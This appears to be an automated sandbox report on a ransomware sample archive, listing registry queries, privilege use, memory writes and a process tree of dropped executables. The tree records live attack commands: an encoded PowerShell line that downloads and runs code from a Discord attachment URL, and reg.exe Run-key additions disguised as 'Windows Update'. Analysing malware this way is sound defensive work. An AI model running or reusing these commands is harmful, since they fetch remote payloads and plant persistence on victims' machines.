Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-3044e01a1877af43c81c2585f2dc9842d9c9a562da13e215e5197a0142eb825f.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
1124	TASKKILL.exe
2868	TASKKILL.exe
8084	TASKKILL.exe
3704	TASKKILL.exe
6420	TASKKILL.exe
6904	TASKKILL.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
3324	reg.exe
4184	reg.exe
4648	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8272	schtasks.exe
3420	schtasks.exe
6164	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3412	powershell.exe
3412	powershell.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
4360	powershell.exe
4360	powershell.exe
4268	powershell.exe
4268	powershell.exe
1164	powershell.exe
1164	powershell.exe
2584	powershell.exe
2584	powershell.exe
3992	powershell.exe
3992	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	4044	7zFM.exe
Token: 35	4044	7zFM.exe
Token: SeSecurityPrivilege	4044	7zFM.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	4560	taskmgr.exe
Token: SeSystemProfilePrivilege	4560	taskmgr.exe
Token: SeCreateGlobalPrivilege	4560	taskmgr.exe
Token: SeDebugPrivilege	2328	taskmgr.exe
Token: SeSystemProfilePrivilege	2328	taskmgr.exe
Token: SeCreateGlobalPrivilege	2328	taskmgr.exe
Token: 33	4560	taskmgr.exe
Token: SeIncBasePriorityPrivilege	4560	taskmgr.exe
Token: SeDebugPrivilege	2416	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
Token: SeDebugPrivilege	3300	Google123.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4268	powershell.exe
Token: SeDebugPrivilege	1164	powershell.exe
Token: SeDebugPrivilege	2584	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	3992	powershell.exe
Token: SeDebugPrivilege	4304	powershell.exe
Token: SeIncreaseQuotaPrivilege	4360	powershell.exe
Token: SeSecurityPrivilege	4360	powershell.exe
Token: SeTakeOwnershipPrivilege	4360	powershell.exe
Token: SeLoadDriverPrivilege	4360	powershell.exe
Token: SeSystemProfilePrivilege	4360	powershell.exe
Token: SeSystemtimePrivilege	4360	powershell.exe
Token: SeProfSingleProcessPrivilege	4360	powershell.exe
Token: SeIncBasePriorityPrivilege	4360	powershell.exe
Token: SeCreatePagefilePrivilege	4360	powershell.exe
Token: SeBackupPrivilege	4360	powershell.exe
Token: SeRestorePrivilege	4360	powershell.exe
Token: SeShutdownPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeSystemEnvironmentPrivilege	4360	powershell.exe
Token: SeRemoteShutdownPrivilege	4360	powershell.exe
Token: SeUndockPrivilege	4360	powershell.exe
Token: SeManageVolumePrivilege	4360	powershell.exe
Token: 33	4360	powershell.exe
Token: 34	4360	powershell.exe
Token: 35	4360	powershell.exe
Token: 36	4360	powershell.exe
Token: SeIncreaseQuotaPrivilege	4360	powershell.exe
Token: SeSecurityPrivilege	4360	powershell.exe
Token: SeTakeOwnershipPrivilege	4360	powershell.exe
Token: SeLoadDriverPrivilege	4360	powershell.exe
Token: SeSystemProfilePrivilege	4360	powershell.exe
Token: SeSystemtimePrivilege	4360	powershell.exe
Token: SeProfSingleProcessPrivilege	4360	powershell.exe
Token: SeIncBasePriorityPrivilege	4360	powershell.exe
Token: SeCreatePagefilePrivilege	4360	powershell.exe
Token: SeBackupPrivilege	4360	powershell.exe
Token: SeRestorePrivilege	4360	powershell.exe
Token: SeShutdownPrivilege	4360	powershell.exe
Token: SeDebugPrivilege	4360	powershell.exe
Token: SeSystemEnvironmentPrivilege	4360	powershell.exe
Token: SeRemoteShutdownPrivilege	4360	powershell.exe
Token: SeUndockPrivilege	4360	powershell.exe
Token: SeManageVolumePrivilege	4360	powershell.exe
Token: 33	4360	powershell.exe
Token: 34	4360	powershell.exe
Token: 35	4360	powershell.exe
Token: 36	4360	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4044	7zFM.exe
4044	7zFM.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
4560	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe
2328	taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4772	OpenWith.exe
1056	cmd.exe
3300	Google123.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3412 wrote to memory of 1056	3412	powershell.exe	104
PID 3412 wrote to memory of 1056	3412	powershell.exe	104
PID 4560 wrote to memory of 2328	4560	taskmgr.exe	106
PID 4560 wrote to memory of 2328	4560	taskmgr.exe	106
PID 1056 wrote to memory of 1968	1056	cmd.exe	108
PID 1056 wrote to memory of 1968	1056	cmd.exe	108
PID 1056 wrote to memory of 1968	1056	cmd.exe	108
PID 1056 wrote to memory of 732	1056	cmd.exe	109
PID 1056 wrote to memory of 732	1056	cmd.exe	109
PID 1056 wrote to memory of 732	1056	cmd.exe	109
PID 1056 wrote to memory of 2416	1056	cmd.exe	112
PID 1056 wrote to memory of 2416	1056	cmd.exe	112
PID 1056 wrote to memory of 3648	1056	cmd.exe	114
PID 1056 wrote to memory of 3648	1056	cmd.exe	114
PID 1056 wrote to memory of 3648	1056	cmd.exe	114
PID 1056 wrote to memory of 1800	1056	cmd.exe	115
PID 1056 wrote to memory of 1800	1056	cmd.exe	115
PID 1056 wrote to memory of 1800	1056	cmd.exe	115
PID 1056 wrote to memory of 1396	1056	cmd.exe	116
PID 1056 wrote to memory of 1396	1056	cmd.exe	116
PID 1056 wrote to memory of 1396	1056	cmd.exe	116
PID 732 wrote to memory of 3608	732	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	117
PID 732 wrote to memory of 3608	732	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	117
PID 732 wrote to memory of 3608	732	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	117
PID 1800 wrote to memory of 3976	1800	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	120
PID 1800 wrote to memory of 3976	1800	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	120
PID 1800 wrote to memory of 3976	1800	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	120
PID 1056 wrote to memory of 4488	1056	cmd.exe	119
PID 1056 wrote to memory of 4488	1056	cmd.exe	119
PID 1056 wrote to memory of 4488	1056	cmd.exe	119
PID 3608 wrote to memory of 1440	3608	WScript.exe	123
PID 3608 wrote to memory of 1440	3608	WScript.exe	123
PID 3608 wrote to memory of 1440	3608	WScript.exe	123
PID 3608 wrote to memory of 4144	3608	WScript.exe	124
PID 3608 wrote to memory of 4144	3608	WScript.exe	124
PID 2416 wrote to memory of 3300	2416	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe	126
PID 2416 wrote to memory of 3300	2416	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe	126
PID 1056 wrote to memory of 1868	1056	cmd.exe	125
PID 1056 wrote to memory of 1868	1056	cmd.exe	125
PID 1056 wrote to memory of 1868	1056	cmd.exe	125
PID 1440 wrote to memory of 2264	1440	Setup.exe	127
PID 1440 wrote to memory of 2264	1440	Setup.exe	127
PID 1440 wrote to memory of 2264	1440	Setup.exe	127
PID 4144 wrote to memory of 4360	4144	smss.exe	128
PID 4144 wrote to memory of 4360	4144	smss.exe	128
PID 4144 wrote to memory of 1164	4144	smss.exe	130
PID 4144 wrote to memory of 1164	4144	smss.exe	130
PID 4144 wrote to memory of 4268	4144	smss.exe	132
PID 4144 wrote to memory of 4268	4144	smss.exe	132
PID 4144 wrote to memory of 2584	4144	smss.exe	134
PID 4144 wrote to memory of 2584	4144	smss.exe	134
PID 4144 wrote to memory of 4644	4144	smss.exe	136
PID 4144 wrote to memory of 4644	4144	smss.exe	136
PID 4144 wrote to memory of 4788	4144	smss.exe	138
PID 4144 wrote to memory of 4788	4144	smss.exe	138
PID 4144 wrote to memory of 3992	4144	smss.exe	140
PID 4144 wrote to memory of 3992	4144	smss.exe	140
PID 4144 wrote to memory of 4304	4144	smss.exe	142
PID 4144 wrote to memory of 4304	4144	smss.exe	142
PID 1056 wrote to memory of 5968	1056	cmd.exe	144
PID 1056 wrote to memory of 5968	1056	cmd.exe	144
PID 1056 wrote to memory of 6028	1056	cmd.exe	146
PID 1056 wrote to memory of 6028	1056	cmd.exe	146
PID 1056 wrote to memory of 6096	1056	cmd.exe	148

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z
1⤵
- Modifies registry class
PID:2396

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4772

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2352

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3412
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Users\Admin\Desktop\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
    HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1968
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 272
      4⤵
      Program crash
      PID:4240
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 296
      4⤵
      Program crash
      PID:5024
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:732
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3608
    - - C:\Users\Admin\Desktop\00486\Setup.exe
        
        "C:\Users\Admin\Desktop\00486\Setup.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1440
      - C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-N2KL6.tmp\Setup.tmp" /SL5="$4036E,3291817,140800,C:\Users\Admin\Desktop\00486\Setup.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2264
    - - C:\Users\Admin\Desktop\00486\smss.exe
        
        "C:\Users\Admin\Desktop\00486\smss.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2584
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4644
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4788
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4304
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
        6⤵
        
        PID:8788
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2416
  - - C:\Users\Admin\AppData\Roaming\Google123.exe
      "C:\Users\Admin\AppData\Roaming\Google123.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3300
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    PID:3648
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1800
  - - C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
      "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3976
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1396
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
      4⤵
      Modifies registry key
      PID:4648
  - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
      "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
      4⤵
      PID:2536
    - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
        
        "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
        5⤵
        
        PID:6892
  - - C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe
      "C:\Users\Admin\AppData\Roaming\Scegli_nome_allegato.exe"
      4⤵
      PID:4388
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4488
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
      4⤵
      Modifies registry key
      PID:3324
  - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
      "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
      4⤵
      PID:5344
    - - C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe
        
        "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe"
        5⤵
        
        PID:3648
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
    HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1868
  - - C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Windows Update" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\7D57AD13E21.exe" /f
      4⤵
      Modifies registry key
      PID:4184
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-074b41f8535ec8adf5ab5014783a7cd3140f5826c74ec324447941a7f2114ced.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:5968
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-2df9c691b1b76356a24fcc18932642ed268a9ca94a3544cacadeed1e64d19a8a.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:6028
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-c672b0b93ad76e1048b0f5845b869872ffac37c5f42f7f05b0dd08a0ddb688f1.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:6096
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-f9db2f36f2f8ac450c76bf898abc67c84779cc7f186ba7c1e55893497c18f6e9.exe
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:2224
- - C:\Users\Admin\Desktop\00486\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-ff48c2bbe7041e51d80d645ab33f62be643c85500bba8705c23f19c36f6b09e1.exe
